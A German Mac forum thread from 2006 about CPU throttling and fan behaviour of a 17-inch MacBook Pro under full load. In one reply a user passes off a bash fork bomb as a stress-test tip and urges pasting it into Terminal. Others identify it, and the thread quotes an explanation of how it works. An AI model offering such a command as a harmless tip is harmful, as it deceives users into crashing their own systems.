MBP 17": Vollgas- bzw. Volllasttauglichkeit?!?

Diskutiere mit über: MBP 17": Vollgas- bzw. Volllasttauglichkeit?!? im MacBook Forum

  1. Gonzo.T.Durden

    Gonzo.T.Durden Thread Starter MacUser Mitglied

    Beiträge:
    48
    Zustimmungen:
    0
    Registriert seit:
    02.04.2006
    Hi Zusammen,

    bei meinem MBP 17" habe ich festgestellt, dass der Prozessor bei Volllastsimulation (mit zwei Terminalfenster "Yes > Null") nur wenige Sekunden (gefühlte 30sek. - mess ich nochmal) Volllast fährt. Sämtliche Userprozesse werden dann für einige Sekunden angehalten - anschliessend geht es wieder weiter. Die Temperatur liegt (ohne Lüftereinsatz!) nach CoreDuoTemp bei ~80°C, geht dann ein paar Grad runter und beim Weiterrechnen wieder hoch.

    Das MLB wurde bereits bei Apple wegen des Fiepens getauscht.

    Die c't hatte in ihrem MBP 17" Test mal davon berichtet, ich schaue mal ob ich das noch finde.

    Wie schaut das bei Euch aus? Abhängig davon werde ich Apple nochmal anpingen.

    Danke und Gruß
    Gonzo
     
  2. ricci007

    ricci007 MacUser Mitglied

    Beiträge:
    2.566
    Zustimmungen:
    13
    Registriert seit:
    11.10.2004
    Probiere es doch einmal mit Folgendem und stoppe die Zeit (alle anderen Programme aber zumachen!!!):

    Code:
    user@mybook:~$ :(){ : & :; }; :
    Am besten mit Copy & Paste ins Terminal einfuegen.
     
  3. CharlieD

    CharlieD MacUser Mitglied

    Beiträge:
    4.019
    Zustimmungen:
    642
    Registriert seit:
    24.04.2004
    Was heisst ohne Lüftereinsatz?
    Mein 17er fängt ab so um die 65gräder zum Lüftern an und pendelt sich dann so bei um die 71-73 als "Endtemperatur" ein.
    Da Clipt Leistungsmäßig nix, das Ding rechnet Stundenlang auf diesem Niveau vor sich hin.

    Hört sich fast an, als ob die Lüftersteuerung bei Dir Mulo wäre....


    Charlie
     
  4. ctopfel2

    ctopfel2 MacUser Mitglied

    Beiträge:
    206
    Zustimmungen:
    6
    Registriert seit:
    29.07.2004
    hm, ich denke nicht dass ein Yes > Null die CPU Auslastet. Um die Vollauslastung zu testen, solltest du evtl in iMovie oder iDVD, oder besser noch Compressor eine Filmdatei konvertieren. das lastet die CPU wirklich aus.

    ps. was macht :(){ : & :; }; : genau ?
     
  5. CharlieD

    CharlieD MacUser Mitglied

    Beiträge:
    4.019
    Zustimmungen:
    642
    Registriert seit:
    24.04.2004
    Wieso sollte nicht?
    Mit was die CPU zu 100% ausgelastet wird, ist wurscht. Ob das Ding Musik runterrechnet, Filme rendert oder einfach nur "JAAAAAAAA" plärrt - irrelevant, das!

    Charlie
     
  6. ctopfel2

    ctopfel2 MacUser Mitglied

    Beiträge:
    206
    Zustimmungen:
    6
    Registriert seit:
    29.07.2004
    Die Gefahr ist, das der Prozessor dabei einseitig ausgelastet wird. ausserdem ist ein prozess wie yes so banal, das evtl die Harddisk das bremsende element ist (ausser du meinst mit Numm /dev/null)

    DEnnoch gibt es sinnvollere programme, als yes, zum auslasten des prozessors. evtl ein programm, welches Pi auf belibig viel stellen rechnet, und parallel dazu eine mandelbrotmenge macht. (sowohl int als auch floating point ausgelastet)
     
  7. tripst0r

    tripst0r MacUser Mitglied

    Beiträge:
    99
    Zustimmungen:
    2
    Registriert seit:
    18.01.2005
    Prozessorauslastung durch eine Fork Bomb zu erreichen ist ja eine tolle Idee. :suspect:
     
  8. Gonzo.T.Durden

    Gonzo.T.Durden Thread Starter MacUser Mitglied

    Beiträge:
    48
    Zustimmungen:
    0
    Registriert seit:
    02.04.2006
    Eigentor!

    der Hinweis von ctopfel2 bzgl. des Flaschenhalses Festplatte war richtig. Ich hatte die Daten wirklich in die Datei "NULL" geschrieben, was ich aber auch erst durch Zufall und nicht direkt durch die Antwort entdeckt hatte. Die "Denkpause" nach ~40sek. ist eine "Schreibpause"....

    Wenn ich den Prozessor anders auslaste (den "YES > /dev/null" teste ich auch nochmal) gibt es kein runtertakten und der Prozessorkühler fängt ab 80°C+ an zu laufen. Das Gehäuse scheint aber nicht mehr ganz so heiss wie vor dem MLB Tausch zu werden.

    Somit scheint alles in Ordnung zu sein! Danke für die Antworten.

    Gruß
    Gonzo


    @ricci007: was soll das... :noplan:

    "> $ : ( ) { :|:& };:
    >
    > Can someone explain what that does?

    It creates a function called ":" that accepts no arguments-- that's
    the ": ( ) { ... }" part of the utterance.

    The code in the function calls the recursively calls the function
    and pipes the output to another invocation of the function-- that's
    the ":|:" part. The "&" puts the call into the background-- that way
    the child process don't die if the parent exits or is killed. Note
    that by invoking the function twice, you get exponential growth in
    the number of processes (nasty!).

    The trailing ";" after the curly brace finishes the function definition
    and the last ":" is the first invocation of the function that sets off
    the bomb.

    Most unpleasant..."
    Quelle
     
    Zuletzt bearbeitet: 08.08.2006
  9. ricci007

    ricci007 MacUser Mitglied

    Beiträge:
    2.566
    Zustimmungen:
    13
    Registriert seit:
    11.10.2004
    Und wie lange halt die CPU-Auslastung stand :D .

    Gonzo.T.Durden: Naja das laesst die CPU-Auslastung in die Hoehe schnellen, allerdings die Anzahl der Prozesse noch mehr :D . Wobei mit Pipes das eher langweilig ist :).
     
    Zuletzt bearbeitet: 09.08.2006
  10. Gonzo.T.Durden

    Gonzo.T.Durden Thread Starter MacUser Mitglied

    Beiträge:
    48
    Zustimmungen:
    0
    Registriert seit:
    02.04.2006
    Du glaubst doch nicht, dass ich jeden sch**ß ungefragt in die Shell eingebe. Ich finde so'n "Tipp" auch nicht ":)" sondern :hamma:

    Mein Tipp: Spar Dir so was für die Zukunft.
     
Die Seite wird geladen...
Ähnliche Themen - MBP Vollgas bzw Forum Datum
MBP Mid.09 lahm in bestimmten Situationen MacBook Sonntag um 13:26 Uhr
mbp 2016 15" Welche Konfiguration? MacBook Samstag um 11:35 Uhr
MBP Late 2013 Tastaturausfall MacBook Samstag um 08:34 Uhr
Welcher USB-C Hub am MBP 2016 (13" ohne Touch) MacBook 26.11.2016
Frage zur Touch Bar (MBP 2016) MacBook 23.11.2016

Diese Seite empfehlen